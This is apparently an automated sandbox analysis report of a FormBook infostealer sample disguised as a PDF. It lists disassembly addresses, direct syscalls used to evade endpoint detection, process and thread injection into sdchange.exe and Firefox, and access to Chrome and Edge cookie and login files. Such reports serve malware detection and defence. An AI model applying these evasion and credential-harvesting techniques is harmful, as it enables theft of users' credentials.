            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D347FB mov eax, dword ptr fs:[00000030h]4_2_32D347FB
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3D7E0 mov ecx, dword ptr fs:[00000030h]4_2_32D3D7E0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D527ED mov eax, dword ptr fs:[00000030h]4_2_32D527ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D527ED mov eax, dword ptr fs:[00000030h]4_2_32D527ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D527ED mov eax, dword ptr fs:[00000030h]4_2_32D527ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEF78A mov eax, dword ptr fs:[00000030h]4_2_32DEF78A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E037B6 mov eax, dword ptr fs:[00000030h]4_2_32E037B6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5D7B0 mov eax, dword ptr fs:[00000030h]4_2_32D5D7B0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]4_2_32D2F7BA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]4_2_32D2F7BA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]4_2_32D2F7BA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]4_2_32D2F7BA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]4_2_32D2F7BA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]4_2_32D2F7BA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]4_2_32D2F7BA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]4_2_32D2F7BA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h]4_2_32D2F7BA
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB97A9 mov eax, dword ptr fs:[00000030h]4_2_32DB97A9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h]4_2_32DBF7AF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h]4_2_32DBF7AF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h]4_2_32DBF7AF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h]4_2_32DBF7AF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DBF7AF mov eax, dword ptr fs:[00000030h]4_2_32DBF7AF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D307AF mov eax, dword ptr fs:[00000030h]4_2_32D307AF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D30750 mov eax, dword ptr fs:[00000030h]4_2_32D30750
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72750 mov eax, dword ptr fs:[00000030h]4_2_32D72750
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D72750 mov eax, dword ptr fs:[00000030h]4_2_32D72750
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DB4755 mov eax, dword ptr fs:[00000030h]4_2_32DB4755
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D43740 mov eax, dword ptr fs:[00000030h]4_2_32D43740
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D43740 mov eax, dword ptr fs:[00000030h]4_2_32D43740
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D43740 mov eax, dword ptr fs:[00000030h]4_2_32D43740
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6674D mov esi, dword ptr fs:[00000030h]4_2_32D6674D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6674D mov eax, dword ptr fs:[00000030h]4_2_32D6674D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6674D mov eax, dword ptr fs:[00000030h]4_2_32D6674D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D38770 mov eax, dword ptr fs:[00000030h]4_2_32D38770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D40770 mov eax, dword ptr fs:[00000030h]4_2_32D40770
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E03749 mov eax, dword ptr fs:[00000030h]4_2_32E03749
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h]4_2_32D2B765
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h]4_2_32D2B765
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h]4_2_32D2B765
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B765 mov eax, dword ptr fs:[00000030h]4_2_32D2B765
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D30710 mov eax, dword ptr fs:[00000030h]4_2_32D30710
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D60710 mov eax, dword ptr fs:[00000030h]4_2_32D60710
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6F71F mov eax, dword ptr fs:[00000030h]4_2_32D6F71F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6F71F mov eax, dword ptr fs:[00000030h]4_2_32D6F71F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D37703 mov eax, dword ptr fs:[00000030h]4_2_32D37703
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D35702 mov eax, dword ptr fs:[00000030h]4_2_32D35702
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D35702 mov eax, dword ptr fs:[00000030h]4_2_32D35702
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6C700 mov eax, dword ptr fs:[00000030h]4_2_32D6C700
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h]4_2_32E0B73C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h]4_2_32E0B73C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h]4_2_32E0B73C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E0B73C mov eax, dword ptr fs:[00000030h]4_2_32E0B73C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29730 mov eax, dword ptr fs:[00000030h]4_2_32D29730
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D29730 mov eax, dword ptr fs:[00000030h]4_2_32D29730
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D65734 mov eax, dword ptr fs:[00000030h]4_2_32D65734
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3973A mov eax, dword ptr fs:[00000030h]4_2_32D3973A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D3973A mov eax, dword ptr fs:[00000030h]4_2_32D3973A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6273C mov eax, dword ptr fs:[00000030h]4_2_32D6273C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6273C mov ecx, dword ptr fs:[00000030h]4_2_32D6273C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6273C mov eax, dword ptr fs:[00000030h]4_2_32D6273C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DAC730 mov eax, dword ptr fs:[00000030h]4_2_32DAC730
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DEF72E mov eax, dword ptr fs:[00000030h]4_2_32DEF72E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D33720 mov eax, dword ptr fs:[00000030h]4_2_32D33720
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4F720 mov eax, dword ptr fs:[00000030h]4_2_32D4F720
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4F720 mov eax, dword ptr fs:[00000030h]4_2_32D4F720
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D4F720 mov eax, dword ptr fs:[00000030h]4_2_32D4F720
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DF972B mov eax, dword ptr fs:[00000030h]4_2_32DF972B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6C720 mov eax, dword ptr fs:[00000030h]4_2_32D6C720
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D6C720 mov eax, dword ptr fs:[00000030h]4_2_32D6C720
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D304E5 mov ecx, dword ptr fs:[00000030h]4_2_32D304E5
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32E054DB mov eax, dword ptr fs:[00000030h]4_2_32E054DB
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32DD94E0 mov eax, dword ptr fs:[00000030h]4_2_32DD94E0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2B480 mov eax, dword ptr fs:[00000030h]4_2_32D2B480

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: NULL target: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeSection loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\sdchange.exeThread register set: target process: 4108Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\sdchange.exeThread APC queued: target process: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeProcess created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"Jump to behavior
            Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exeProcess created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: cXGDMXIloFhOE.exe, 00000006.00000000.2521666892.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2937048524.0000000000F11000.00000002.00000001.00040000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2937737692.0000000000F11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2937577500.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2937146077.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2935957213.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2937634910.0000000000F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2633149796.00000000329F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2937326522.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2633741377.0000000033050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
